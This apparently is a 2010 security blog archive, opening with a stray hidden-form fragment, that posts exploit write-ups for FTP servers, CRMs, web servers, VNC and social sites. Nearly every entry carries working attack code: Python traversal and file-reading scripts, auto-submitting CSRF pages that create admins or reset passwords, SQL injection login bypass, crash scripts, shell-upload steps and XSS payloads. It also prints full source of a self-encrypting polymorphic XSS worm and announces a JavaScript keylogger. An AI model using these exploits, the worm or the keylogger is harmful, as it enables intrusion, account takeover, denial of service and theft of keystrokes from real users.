            <input type="hidden" name="emailAddressVerifiedFlag0" value="true" />
            <input type="hidden" name="emailAddressVerifiedValue0" value="" />
            <input type="hidden" name="useEmailWidget" value="true" />
            <input type="hidden" name="email_link_type" value="sugar" />
            <input type="hidden" name="mail_smtpuser" value="" />
            <input type="hidden" name="mail_smtppass" value="" />
            <input type="hidden" name="employee_status" value="Active" />
            <input type="hidden" name="title" value="" />
            <input type="hidden" name="phone_work" value="" />
            <input type="hidden" name="department" value="" />
            <input type="hidden" name="phone_mobile" value="" />
            <input type="hidden" name="reports_to_name" value="" />
            <input type="hidden" name="reports_to_id" value="" />
            <input type="hidden" name="phone_other" value="" />
            <input type="hidden" name="phone_fax" value="" />
            <input type="hidden" name="phone_home" value="" />
            <input type="hidden" name="messenger_type" value="" />
            <input type="hidden" name="messenger_id" value="" />
            <input type="hidden" name="address_street" value="" />
            <input type="hidden" name="address_city" value="" />
            <input type="hidden" name="address_state" value="" />
            <input type="hidden" name="address_postalcode" value="" />
            <input type="hidden" name="address_country" value="" />
            <input type="hidden" name="description" value="" />
            <input type="hidden" name="receive_notifications" value="12" />
            <input type="hidden" name="export_delimiter" value="," />
            <input type="hidden" name="mailmerge_on" value="0" />
            <input type="hidden" name="reminder_time" value="60" />
            <input type="hidden" name="default_export_charset" value="ISO-8859-1" />
            <input type="hidden" name="user_max_tabs" value="12" />
            <input type="hidden" name="user_max_subtabs" value="12" />
            <input type="hidden" name="user_subpanel_tabs" value="on" />
            <input type="hidden" name="dateformat" value="m/d/Y" />
            <input type="hidden" name="currency" value="-99" />
            <input type="hidden" name="timeformat" value="H:i" />
            <input type="hidden" name="default_currency_significant_digits" value="2" />
            <input type="hidden" name="timezone" value="Africa/Abidjan" />
            <input type="hidden" name="ut" value="0" />
            <input type="hidden" name="num_grp_sep" value="," />
            <input type="hidden" name="default_locale_name_format" value="s f l" />
            <input type="hidden" name="dec_sep" value="." />
            <input type="hidden" name="calendar_publish_key" value="" />
            <input type="hidden" name="outboundtest_from_address" value="" />
        </form>
    </body>
</html>

Core FTP Server 1.0.343 Directory Traversal

2010-05-27T19:42:00.000-07:00

It's possible to navigate the local file system of a server running Core FTP Server 1.0.343 by using a specially crafted URL.

Exploit
/...

PoC
list_root.py

import sys, socket, re

host = 'localhost'
port = 21
user = 'anonymous'
password = 'a'

buffer_size = 8192
timeout = 8

def recv(s):
    resp = ''

    while 1:
        r = s.recv(buffer_size)
        if not r: break
        resp += r

    return resp

def list_root():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.settimeout(timeout)

        print s.recv(buffer_size)            

        s.send('USER ' + user + '\r\n')                   
        print s.recv(buffer_size)            

        s.send('PASS ' + password + '\r\n')               
        print s.recv(buffer_size) + s.recv(buffer_size)

        s.send('CWD ' + '/...' * 16 + '\r\n')

        resp = s.recv(buffer_size)

        print resp
        
        if resp[:3] == '250':
            s.send('PASV\r\n')                                   
            resp =  s.recv(buffer_size)

            print resp
            
            pasv_info = re.search(u'(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)', resp)

            if (pasv_info == None):
                print 'Invalid PASV response: ' + resp
                return            

            s.send('LIST\r\n')            

            s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s2.connect((host, int(pasv_info.group(5)) * 256 + int(pasv_info.group(6))))
            s2.settimeout(timeout)           

            print recv(s2)

        s.close()

    except Exception:        
        print sys.exc_info()

list_root()

Home FTP Server 1.10.2.143 Directory Traversal

2010-05-27T17:17:00.000-07:00

A directory traversal vulnerability in Home FTP Server 1.10.2.143 can be exploited to read, write, and delete files outside of the ftp root directory.

Exploit
RETR [Drive Letter]:\[Filename]
STOR [Drive Letter]:\[Filename]
DELE [Drive Letter]:\[Filename]

PoC
get_boot_ini.py

import sys, socket, re

host = 'localhost'
port = 21
user = 'anonymous'
password = ''

timeout = 8

buffer_size = 8192

def get_data_port(s):
    s.send('PASV\r\n')
    
    resp =  s.recv(buffer_size)

    pasv_info = re.search(u'(\d+),' * 5 + u'(\d+)', resp)

    if (pasv_info == None):
        raise Exception(resp)
                    
    return int(pasv_info.group(5)) * 256 + int(pasv_info.group(6))

def retr_file(s, filename):
    pasv_port = get_data_port(s)

    if (pasv_port == None):        
        return None    

    s.send('RETR ' + filename + '\r\n')
    resp = s.recv(8192)    

    if resp[:3] != '150': raise Exception(resp)

    print resp
    
    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    
    s2.connect((host, pasv_port))
    s2.settimeout(2.0)                                     
    resp = s2.recv(8192)
    s2.close()    

    return resp

def get_file(filename):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(timeout)

    print s.recv(buffer_size)            

    s.send('USER ' + user + '\r\n')                   
    print s.recv(buffer_size)            

    s.send('PASS ' + password + '\r\n')               
    print s.recv(buffer_size)

    print retr_file(s, filename)

    print s.recv(buffer_size)        

    s.close()

get_file('c:\\boot.ini')

Brekeke PBX 2.4.4.8 Cross-site Request Forgery

2010-05-26T14:23:00.000-07:00

A cross-site request forgery vulnerability in Brekeke PBX 2.4.4.8 can be exploited via GET request to change the admin password.

PoC

<html>
<body>
    <img src="http://localhost:28080/pbx/gate?bean=pbxadmin.web.PbxUserEdit&user=sa&disabled=false&name=&language=en&password=new_password&password2=new_password&phoneforward=&ringertime=60&noanswerforward=vmsa&noanswerforward.voicemail=on&busyforward=vmsa&busyforward.voicemail=on&dtmfcommand=true&defaultpickup=&index=1&greetingtype=3&recordlength=&messageforward=&email=&emailnotification=true&emailattachment=true&admin=true&userplugin=user&personalivr=&rtprelay=default&payload=&useremotepayload=default&recording=false&canjoin=true&allowjoin=true&aotomonitor=&maxsessioncount=-1&resourcemap=&operation=store" />
</body>
</html>

Pacific Timesheet 6.74 Cross-site Request Forgery

2010-05-26T14:19:00.000-07:00

A cross-site request forgery vulnerability in Pacific Timesheet 6.74 can be exploited via GET request to create a new admin.

PoC

<html>
<body>
    <img src="http://localhost/timesheet/user/user-set.do?userId=0&flag=&cloneId=&wizard-page=1&loginX=new_admin&passwordX=password&passwordConfirmX=password&firstName=&lastName=a&uid=&status=A&roleId=1&type=&policyId=1&jobTitle=&groupId=0&billRateId=0&billRate=&payRateId=0&payRate=&salary=&firstDay=5%2F22%2F2010&lastDay=&scheduledDay%5B1%5D=on&scheduledDay%5B2%5D=on&scheduledDay%5B3%5D=on&scheduledDay%5B4%5D=on&scheduledDay%5B5%5D=on&scheduledHours=&scheduledHoursPerDay=&scheduledIn=&scheduledOut=&email=&phone=&mobile=&fax=&timeSheetId=1&carryForward=1&timeFormat=0&locale=en_US&timeZone=America%2FNew_York&apprv0Id=0&apprv0bId=0" />
</body>
</html>

Home FTP Server 1.10.2.143 Cross-site Request Forgery

2010-05-26T14:17:00.000-07:00

A cross-site request forgery vulnerability in Home FTP Server 1.10.2.143 can be exploited via GET request to create an admin account with all permissions (read, write, delete, etc.)

PoC

<html>
<body>
    <img src="http://localhost/?addnewmember=new_user&pass=Password1&home=c:\&allowdownload=on&allowupload=on&allowrename=on&allowdeletefile=on&allowchangedir=on&allowcreatedir=on&allowdeletedir=on&virtualdir=&filecontrol=" />
</body>
</html>

Tele Data's Contact Management Server 0.9 Arbitrary File Write

2010-05-23T17:37:00.000-07:00

An arbitrary file write vulnerability in Tele Data's Contact Management Server 0.9 can be exploited to write to the local file system of the server.

PoC
Login as an administrator and navigate to http://localhost/command.html?Cmd=SQL_Save&SQL=hello%20world&FileName=..\..\..\..\..\..\..\..\..\x.txt

Tele Data's Contact Management Server 0.9 Local File Inclusion

2010-05-23T17:35:00.000-07:00

A local file inclusion vulnerability in Tele Data's Contact Management Server 0.9 can be exploited to read files from the server file system.

PoC
Login as an administrator and navigate to http://localhost/command.html?Cmd=SQL_Load&FileName=..\..\..\..\..\..\..\..\..\boot.ini

Open Forum Server 2.2 b005 Arbitrary File Write

2010-05-23T13:47:00.000-07:00

An arbitrary file write vulnerability in the saveAsAttachment method of Open Forum Server 2.2 b005 can be exploited to write to the local file system of the server.

Exploit
Upload a get.sjs file that calls the vulnerable method. Request the script's containing folder.

PoC

import sys, socket
host = 'localhost'
port = 80

def send_request(request):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(32) # sometimes it takes a while
    s.connect((host, port))
    s.send(request)

    response = s.recv(8192) + s.recv(8192) # a hack within a hack   

    return response

def write_file():
    try:
        content = '----x--\r\n'\
                  'Content-Disposition: form-data; name="file"; filename="get.sjs"\r\n'\
                  'Content-Type: application/octet-stream\r\n\r\n'\
                  'fileName = "' + '..\\\\' * 256 + 'x.txt";\r\n'\
                  'data = "hello, world";\r\n'\
                  'user = transaction.getUser();\r\n'\
                  'wiki.saveAsAttachment("x",fileName,data,user);\r\n'\
                  'transaction.sendPage("File Written");\r\n\r\n'\
                  '----x----\r\n'
        
        response = send_request('POST OpenForum/Actions/Attach?page=OpenForum HTTP/1.1\r\n'
                                'Host: ' + host + '\r\n'
                                'Content-Type: multipart/form-data; boundary=--x--\r\n'
                                'Content-Length: ' + str(len(content)) + '\r\n\r\n' + content)

        if 'HTTP/1.1 302 Redirect' not in response:
            print 'Error writing get.sjs'
            return
        else: print 'get.sjs created'
        
        response = send_request('GET OpenForum HTTP/1.1\r\n'
                                'Host: ' + host + '\r\n\r\n')

        if 'File Written' not in response:
            print 'Error writing to root'
            return
        else: print 'x.txt created in root'
        
    except Exception:
        print sys.exc_info()          

write_file()

vtiger CRM 5.2.0 Shell Upload

2010-05-21T17:09:00.000-07:00

A shell upload vunlerability in vtiger CRM 5.2.0 can be exploited to execute arbitrary PHP.

Exploit
Upload a PHP file and append a backslash to the filename_hidden value.

PoC

Capture the packet using a debugging proxy, append a backslash to the filename_hidden value, and submit it. e.g.

------WebKitFormBoundaryihWhA69lH4hKrGBy
Content-Disposition: form-data; name="filename_hidden"

shell.php\

Navigate to the uploaded file http://localhost/storage/{Year}/{Month}/{Week}/{file} e.g. http://localhost/storage/2010/May/week3/shell.php

vtiger CRM 5.2.0 XSRF

2010-05-21T16:53:00.000-07:00

A cross-site request forgery vunlerability in vtiger CRM 5.2.0 can be exploited to create an new admin. The form values can also be sent via GET request, but the resulting user does not have admin privileges.

PoC:

<html>
    <body onload="document.forms[0].submit()">        
        <form name="EditView" method="post" action="http://localhost/index.php">            
            <input type="hidden" name="module" value="Users" />
            <input type="hidden" name="mode" value="create" />
            <input type="hidden" name="action" value="Save" />
            <input type="hidden" name="user_name" value="new_user" />
            <input type="hidden" name="is_admin" value="on" />
            <input type="hidden" name="user_password" value="new_password" />
            <input type="hidden" name="confirm_password" value="new_password" />
            <input type="hidden" name="email1" value="test@test.com" />
            <input type="hidden" name="status" value="Active" />
        </form>
    </body>
</html>

Fortitude HTTP 1.0.1.6 Denial-of-Service

2010-05-17T20:44:00.000-07:00

Fortitude HTTP 1.0.1.6 crashes upon receving an HTTP request containing a relative resource path with an excessive number of slashes.

Exploit
GET / * 8192 HTTP 1.1
Host: localhost

PoC

import socket
host ='localhost'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

s.send('GET ' + '/' * 8192 + ' HTTP/1.1\r\n'
       'Host: ' + host + '\r\n\r\n')

DataTrack System 3.5 Persistent XSS / Directory Disclosure / Configuration Disclosure / Source Disclosure

2010-05-17T20:19:00.001-07:00

Persistent XSS
User submitted data is not HTML entity encoded before it is rendered.

Exploit
Login using the web client and submit a request with summary set to <script>alert(0)</script>. Navigate to My History to see the result.

Directory Disclosure
The contents of the root directory can be listed by using a specially crafted URL.

Exploit
%u0085
%u00A0

PoC
http://localhost/%u0085/
http://localhost/%u00A0/

Configuration / Source Disclosure
Forbidden file types (e.g. ascx, config) can be downloaded by appending a backslash to the filename.

Exploit
GET /web.config\ HTTP/1.1
Host: localhost

PoC

import socket
host ='localhost'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('GET /web.config\ HTTP/1.1\r\n'\
       'Host: ' + host + '\r\n\r\n')

while 1:
    response = s.recv(8192)
    if not response: break
    print response

Open Forum Server 2.2 b005 Directory Traversal

2010-05-15T22:03:00.000-07:00

It's possible to navigate the local file system of a server running Open Forum Server 2.2 b005 by using a specially crafted URL.

Exploit:
%2F../
%5C../
%5C

PoC:
http://localhost/%5C../%5C../%5C../%5C../%5C../%5C../%5C../boot.ini

http://localhost/Admin/Users/Admin/private%5Cpassword.txt

Note: the percent encoded backslash in the second second url bypasses authentication. However, the response is malformed so a debugging proxy may be necessary to view it.

Zipserver 1.0 Directory Traversal

2010-05-15T19:08:00.000-07:00

It's possible to navigate the local file system of a server running Zipserver 1.0 by using a specially crafted URL.

Exploit:
..%2F/
..%5C/

PoC:
http://localhost/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/

http://localhost/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/

The Uniform Server 5.6.5 XSRF

2010-05-15T16:37:00.000-07:00

A cross-site request forgery vunlerability in The Uniform Server 5.6.5 web UI can be exploited to change various administrative passwords.

PoC:

<html>
<head>
    <script type="text/javascript">
        window.onload = function() {
            var url = 'http://localhost/apanel';
            
            var xsrs = [
                {
                    "action": url + "/apsetup.php",
                    "method": "post",
                    "submitCall": "document.forms[0].submit.click()",
                    "fields": [
                        { "name": "apuser", "value": "new_username" },
                        { "name": "appass", "value": "new_password" },
                        { "name": "submit", "value": "Change", "type": "submit" }
                    ]
                },
                {
                    "action": url + "/psetup.php",
                    "method": "post",
                    "submitCall": "document.forms[0].submit.click()",
                    "fields": [
                        { "name": "puser", "value": "new_username" },
                        { "name": "ppass", "value": "new_password" },
                        { "name": "submit", "value": "Change", "type": "submit" }
                    ]
                },
                {
                    "action": url + "/sslpsetup.php",
                    "method": "post",
                    "submitCall": "document.forms[0].submit.click()",
                    "fields": [
                        { "name": "puser", "value": "new_username" },
                        { "name": "ppass", "value": "new_password" },
                        { "name": "submit", "value": "Change", "type": "submit" }
                    ]
                },
                {
                    "action": url + "/mqsetup.php",
                    "method": "post",
                    "submitCall": "document.forms[0].submit.click()",
                    "fields": [
                        { "name": "qpass", "value": "new_password" },
                        { "name": "submit", "value": "Change", "type": "submit" }
                    ]
                }
            ];

            for (var x = 0; x < xsrs.length; x++) {
                var attackFrame = document.createElement('iframe');

                var html = '<html><body><form action="' + xsrs[x].action + '" ' +
                    'method="' + xsrs[x].method + '">';

                for (var y = 0; y < xsrs[x].fields.length; y++) {
                    html += '<input type="' +
                        (xsrs[x].fields[y].type != null ?
                            xsrs[x].fields[y].type : 'hidden') + '" ' +
                        'name="' + xsrs[x].fields[y].name + '" ' +
                        'value="' + xsrs[x].fields[y].value + '" />';
                }

                html += '</form><script>' + xsrs[x].submitCall + '\x3c/script></body></html>';

                document.body.appendChild(attackFrame);

                attackFrame.contentDocument.write(html);
            }
        }
    </script>
</head>
<body>
</body>
</html>

ProjectForum 6.5.2.2978 XSRF / XSS

2010-05-13T17:40:00.000-07:00

A cross-site request forgery vunlerability in ProjectForum 6.5.2.2978 can be exploited to reconfigure the server (e.g. admin password, create group password, port) with a malicious GET request.

PoC:

<html>
    <body>
        <img src="http://localhost/admin/site.html?adminpasswd=new_password&adminpasswd2=new_password&port=80&theme=default&createpasswd=new_password&createpasswd2=new_password&action=Save+Changes&formSubmitted=1" />   
    </body>
</html>

Several reflected and persistent cross-site scripting vulnerabilities are present.

PoC:
Reflected:
http://localhost/1/admin/newpage.html?name=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Persistent:
Edit a page and add the following
http://"onmouseover="alert(0)"style="position:absolute;top:0;left:0;width:9999px;height:9999px;

Abyss Web Server X1 XSRF

2010-05-13T15:30:00.000-07:00

A cross-site request forgery vunlerability in the Abyss Web Server X1 management console can be exploited to change both the username and password of the logged in user.

PoC:


<html>
    <body onload="document.forms[0].submit()">
        <form method="post" action="http://localhost:9999/console/credentials">
            <input type="hidden" name="/console/credentials/login" 
                   value="new_username" />    
            <input type="hidden" name="/console/credentials/password/$pass1" 
                   value="new_password" />    
            <input type="hidden" name="/console/credentials/password/$pass2" 
                   value="new_password" />    
            <input type="hidden" name="/console/credentials/bok" 
                   value="%C2%A0%C2%A0OK%C2%A0%C2%A0" />    
        </form>    
    </body>
</html>

Zervit 0.4 Directory Traversal

2010-05-11T19:43:00.000-07:00

It's possible to navigate the local file system of a server running Zervit 0.4 by using a specially crafted HTTP request. The resource path must be relative and the slashes unencoded.

Exploit:
GET /\../ HTTP/1.1

Host: localhost

or

GET //../ HTTP/1.1

Host: localhost

PoC:
zervit0.4-traversal.py

import sys, struct, socket
host ='localhost'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('GET /' + '\..' * 32 + '/ HTTP/1.1\r\n'
       'Host: ' + host + '\r\n\r\n')

while 1:
    response = s.recv(8192)
    if not response: break
    print response

Mereo 1.9.1 Directory Traversal

2010-05-09T19:24:00.000-07:00

It's possible to navigate the local file system of a server running Mereo 1.9.1 by using a specially crafted URL.

Exploit: %80../

PoC: http://localhost/%80../%80../%80../%80../%80../%80../%80../%80../

Tumblr.com Persistent XSS

2010-05-08T14:59:00.000-07:00

onmouseover attributes added to user submitted markup via HTTP proxy are not stripped.

Exploit: Create a new link, add a description, and set the HTML to <h1>test</h1>. Submit the form and capture the request using an HTTP proxy (e.g. Fiddler). Change the post[three] value to <h1 onmouseover="alert(0)">test</h1> and resume the request.

PoC: http://asdfffffffff.tumblr.com/

Friendster.com Persistent XSS

2010-05-06T19:00:00.000-07:00

Only one sanitization pass is performed on user submited data.

Exploit: <<z>script>alert(0)<<z>/script>

PoC: http://profiles.friendster.com/31202727

Zolsoft Office Server Free Edition 2010.0502 XSRF

2010-05-06T17:30:00.000-07:00

A cross-site request forgery vunlerability in the Zoloft Office Server Web UI can be exploited to change the password of a user.


<html>
<body onload="document.forms[0].submit()">
    <form action="http://localhost/options3.htm" method="post">
       <input type="hidden" name="PassField1" value="new_password" />
       <input type="hidden" name="PassField2" value="new_password" />       
    </form>
</body>
</html>

RealVNC VNC Server Free Edition 4.1.3 Denial Of Service

2010-05-02T18:11:00.000-07:00

Sending a ClientCutText Message with a length of 0xFFFFFFFF crashes the server with the exception shown below. Note: while the vulnerability is present regardless of authentication, for the sake of simplicity this script only works on servers configured to run with no authentication.

winvnc4.exe: The instruction at 0x425BE4 referenced memory at 0xFFFFFF00. The memory could not be written (0x00425BE4 -> FFFFFF00)

vncserver413-DoS.py


import sys, struct, socket
host ='localhost'
port = 5900

def crash_vnc_server():
    try:
        while 1:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((host, port))
            s.settimeout(1.0)       
            
            print 'Connected'

            try:
                b = s.recv(8192)
                print 'ProtocolVersion Received'
                
                s.send(b)
                print 'ProtocolVersion Sent'            
                
                b = s.recv(8192)
                print 'Security Received'

                s.send('\x01')
                print 'Security Sent'
                
                b = s.recv(8192)
                print 'SecurityResult Received'

                if (len(b) == 4 and
                    b[0] == chr(0) and
                    b[1] == chr(0) and
                    b[2] == chr(0) and
                    b[3] == chr(0)):
                    print 'SecurityResult OK'
                else:
                    print 'SecurityResult Failed.\n\nThe server must be set '\
                          'to No Authentication for this to work, otherwise '\
                          'you \'ll need to write the necessary client side '\
                          'authentication code yourself.'
                    return           

                s.send('\x01')
                print 'ClientInit Sent'
                
                b = s.recv(8192)
                print 'ServerInit Received'

                text_len = 0xFFFFFF
                text_str = struct.pack('L', text_len) + '\xAA' * text_len
                
                while 1:
                    s.send('\x06\x00\x00\x00' + text_str)

                    print 'ClientCutText Sent'
                
            except Exception:
                print 'Connection closed'                
            
    except Exception:
        print 'Couldn\'t connect'

crash_vnc_server()

Friendster.com Persistent XSS

2010-05-02T13:13:00.001-07:00

Data submitted via album description and a few other fields is not properly escaped before being rendered into javascript.

Exploit: \";alert(0);//

PoC: http://www.friendster.com/viewalbums.php?uid=120927091

ddrLPD 1.0 Denial Of Service

2010-05-02T12:06:00.000-07:00

Sending packets composed of bytes between 1 and 5 (inclusive) causes ddrLPD 1.0 to crash with the exception below.

The instruction at 0x50431A referenced memory at 0x0. The memory could not be read (0x0050431A -> 00000000)

ddrLPD10-DoS.py


import socket
host ='localhost'

try:
    while 1:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, 515))
        s.settimeout(1.0)
        
        print 'connected',

        try:
            while 1:        
                s.send('\x01'*8192)
                print '.',
        except Exception:
            print '\nconnection closed'
            pass
        
except Exception:
    print 'couldn\'t connect'

Tele Data Contact Management Server 0.9 SQL Injection

2010-04-28T14:29:00.000-07:00

Tele Data Contact Management Server doesn't have much in the way of security. It's possible to log in with admin privileges by injecting SQL into the username field. As there are client side length constraints in place for the username field I packaged the exploit in some javascript for ease of use.

Exploit: or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--

PoC: javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();

OneHTTPD 0.6 Directory Traversal

2010-04-27T18:30:00.000-07:00

It's possible to navigate the local file system of a server running OneHTTPD 0.6 by using a specially crafted url.

http://localhost/%C2../%C2../%C2../%C2../%C2../%C2../%C2../%C2../

Stumpleupon.com Reflected XSS

2010-04-26T20:01:00.000-07:00

The code that displays spelling corrections does not encode user submitted data.

http://www.stumbleupon.com/search?q=teh<script>alert(0)</script>

Ning.com Persistent XSS

2010-04-26T19:01:00.000-07:00

Less than and greater than characters submitted in the descriptions of albums, images and probably others are unencoded. Any tags submitted in such fields are subjected to whitelist validation, but this can be bypassed by prepending a less than character to the injected open and close tags.

Exploit: <<script>alert(0)//<</script>

PoC: http://coniferous.ning.com/photo/792231134-1

Javascript Keylogger 1.4 Released

2010-04-25T08:02:00.000-07:00

A python HTTP server has been added to allow for greater cross-platform compatibility.

Download 1

Download 2

Prion 1.3 Released - Polymorphic XSS Worm

2010-04-11T19:03:00.000-07:00

Because of Prion's large memory footprint it isn't suitable for use with every XSS vulnerability. For this reason I decided to create Prion Lite, a scaled down version of Prion small enough to be used with most XSS vulnerabilities, reflected or persistent. Of course this comes at a cost: unlike Prion, which carries its entire codebase with it, instances of the new Lite version must reference an off-site javascript file, another piece of evidence for anyone that might be looking for such things.

1.3 Changes
Cleaned up code
Prion lite added
Mickey mouse encryption algorithm updated (Prion lite only)
Reorder transformation added (Prion lite only)
Miscellaneous bug fixes

Download

Prion 1.2 Released - Polymorphic XSS Worm

2010-04-05T14:01:00.000-07:00

Prion 1.2 is out, and it's quite an improvement over the last version. The updated encoding algorithm eliminated a lot of bloat, and the new code transformations make the decryptor of each worm instance unique.

1.2 Changes
Integer splitting transformation added
Variable rename transformation added
Added compressed version
Test UI updated

Download

/* Prion 1.2 by John Leitch - john.leitch5@gmail.com  *//*worm start*/var startToken='/*worm start*/',endToken='/*worm '+'end*/';var generatedVars=new Array();function random(a,b){return Math.round((b-a)*Math.random()+a)}var varNameChars='_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';function genVarName(){var a;do{var b=random(3,14);a='';for(var i=0;i<b;i++){var r=random(0,varNameChars.length-1);a+=varNameChars[r]}}while(varUsed(a));return a}function varUsed(a){for(var i=0;i<generatedVars.length;i++){if(generatedVars[i]==a){return true}}return false}function transformInt(a,b){var c=['+','-','*','/'];var d='';for(var i=0;i<b;i++){var e=random(0,3);var f=d.match(/-?[\d\.]+/g);if(f!=null){for(var j=0;j<f.length;j++){if(f[j].indexOf('.')!=-1){f.splice(j,1);j--;continue}}if(f.length==0)break}if(d!=''){var g=f[random(0,f.length-1)];a=parseInt(g.match(/-?\d+/))}var h='';switch(e){case 0:var x=random(-1000,1000);var y=a-x;h='('+x+'+'+y+')';break;case 1:var y=random(0,1000);var x=a+y;h='('+x+'- '+y+')';break;case 2:var y=random(-1000,1000);var x=a/y;h='Math.round('+x+'*'+y+')';break;case 3:var y=random(-1000,1000);var x=a*y;h='('+x+'/'+y+')';break}if(d!=''){var k=new RegExp('([^\\d\\.]|^)'+a+'(([^\\d\\.])|$)');var l=d;d=d.replace(k,'$1'+h+'$2');try{var m=eval(d)}catch(err){alert('error evaling\r\n\r\n'+'old: '+l+'\r\n\r\n'+'new: '+d+'\r\n\r\n'+'regex: '+k+'\r\n\r\n'+'error: '+err)}}else{d=h}}return d}function encrypt(a){var b=[Math.floor(Math.random()*256),Math.floor(Math.random()*256)];var d=genVarName();var e=genVarName();var f=genVarName();var g=genVarName();var h=8;var j=transformInt(32,random(2,h));var k=transformInt(127,random(2,h));var l=transformInt(2,random(2,h));var m=startToken+'var k0='+b[0]+'\x3b'+'var k1='+b[1]+'\x3b'+'var '+d+'=\'';for(var i=0;i<a.length;i++){var c=(a.charCodeAt(i)^b[0]^b[1]).toString(16);m+=c.length==2?c:+'0'+c}m+='\'\x3bvar '+e+'=\'\'\x3b'+'for(var '+f+'=0;'+f+'<'+d+'.length;'+f+'+=2){'+'var '+g+'=parseInt('+d+'['+f+']+'+d+'['+f+'+1],16)^k0^k1\x3b'+'if('+g+'==10 || ('+g+'>='+j+' && '+g+'\x3c'+k+'))'+'{'+e+'+=String.fromCharCode('+g+')\x3b}'+''+'}'+'if('+e+'['+e+'.length-1]!=\'\x3b\'){'+e+'='+e+'.substring(0,('+e+'.length-'+l+'))\x3b'+'}'+'eval('+e+');'+endToken;return m}function findKey(a,b){var c=new RegExp('var\\sk'+b+'=(\\d+)');var d=c.exec(a);if(d==null){alert('key byte '+b+' not found');return null}return d[1]}function decrypt(a){var b=[findKey(a,0),findKey(a,1)];if(!b[0]||!b[1])return;var c=a.match(/var\s[\w_]+='([\d\w]+)'\x3b/);if(c==null){alert('packed code not found');return}var d='';var e=c[1].split(',');for(var i=0;i<c[1].length;i+=2){d+=String.fromCharCode(parseInt(c[1][i]+c[1][i+1],16)^b[1]^b[0])}return d}function findSelf(a){var x=a.indexOf(startToken)+startToken.length;var y=a.indexOf(endToken,x);var b=a.substring(x,y);b=b.replace(/\x26lt;/g,'\x3c');return b}var code=findSelf(document.body.innerHTML);if(code.indexOf('var k0=')==0){code=decrypt(code)}var encoded=encrypt(code);document.getElementById('xssWorm').innerHTML=encoded.replace(/\x3c/g,'\x26lt;');/*worm end*/

Prion 1.1 Released - Polymorphic XSS Worm

2010-03-29T19:14:00.000-07:00

I've affectionately named my worm Prion and released a new version with several browser compatibility fixes and a new test page (embedded below). Click the execute button a few times to see it work.

Old sample removed. An updated version can be found here

Download

Polymorphic XSS Worm

2010-03-28T11:10:00.000-07:00

Note: This entry is out of date; several fixes have been made. New download here

As the title suggests here is a generic, polymorphic XSS worm. With each infection the worm re-encrypts itself using a basic XOR cipher. The only piece missing is the code that sends the obfuscated script (stored in the encoded variable) to it's next target, likely a persistent XSS vulnerability. Below is the complete source. To see it in action save the source to an HTML file then view it. The javascript outputted to the text area is the repackaged worm; to test the repackaged source, replace the javascript of the sample below with the encrypted code and view the page again.

Polymorphic XSS Worm Source


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
    <title>Polymorphic XSS Worm</title>   
</head>
<body>
    <textarea id="xssWorm" style="width:400px;height:600px;"></textarea>
    
    <script type="text/javascript">
        /*  Polymorphic XSS Worm by John Leitch - john.leitch5@gmail.com  */
                    
        /*worm start*/    
        var startToken = '/*worm start*/',
            endToken = '/*worm ' + 'end*/';

        function encode(code) {
            var key = Math.floor(Math.random() * 256);

            var packed = startToken + 'var k=' + key + ';var a=[';

            for (var i = 0; i < code.length; i++) {
                packed += (code.charCodeAt(i) ^ key) + ',';
            }

            packed += '];var d=\'\';' +
                'for (var i=0;i<a.length;i++)' + 
                    '{d+=String.fromCharCode(a[i]^k);}eval(d);' + endToken;

            return packed;
        }

        function decode(code) {
            var keyMatch = code.match(/var\sk=(\d+)/);

            if (keyMatch == null) {
                alert('key not found');

                return;
            }

            var key = keyMatch[1];

            var codeMatch = code.match(/var\sa=\[([\d{1,3},]+)\];/);

            if (codeMatch == null) {
                alert('packed code not found');

                return;
            }

            var unpacked = '';

            var codeBytes = codeMatch[1].split(',');

            for (var i = 0; i < codeBytes.length; i++) {
                if (!codeBytes[i]) {
                    continue;
                }

                unpacked += String.fromCharCode(codeBytes[i] ^ key);
            }

            return unpacked;
        }

        function findSelf(response) {
            var x = response.indexOf(startToken) + startToken.length;
            var y = response.indexOf(endToken, x);

            var code = response.substring(x, y);

            return code;
        }

        var code = findSelf(document.body.innerHTML);

        if (code.indexOf('var k=') == 0) {
            code = decode(code);
        }

        var encoded = encode(code);

        // This is where the newly obfuscated worm (stored in encoded)
        // is passed on to it's next target. But because we don't have a
        // target we'll spit the newly obfuscated code out to a textarea.

        document.getElementById('xssWorm').value = encoded;
        /*worm end*/
    </script>
</body>
</html>

Javascript Keylogger 1.3 Released

2010-03-27T14:23:00.000-07:00

Changes:

Log entries now categorized by page view and field rather than just field
Fixed server crash bugs
Fixed bug related to replacing head & body

Download 1

Download 2

Happy keystroke logging!

Javascript Keylogger 1.2 Released

2010-03-22T15:09:00.000-07:00

Download 1

Download 2

Javascript Keylogger 1.1 Released - HTTP Server Added

2010-03-13T17:55:00.000-08:00

Javascript Keylogger has been updated. The new release contains an a customized HTTP server that generates keystroke reports.

From the readme:

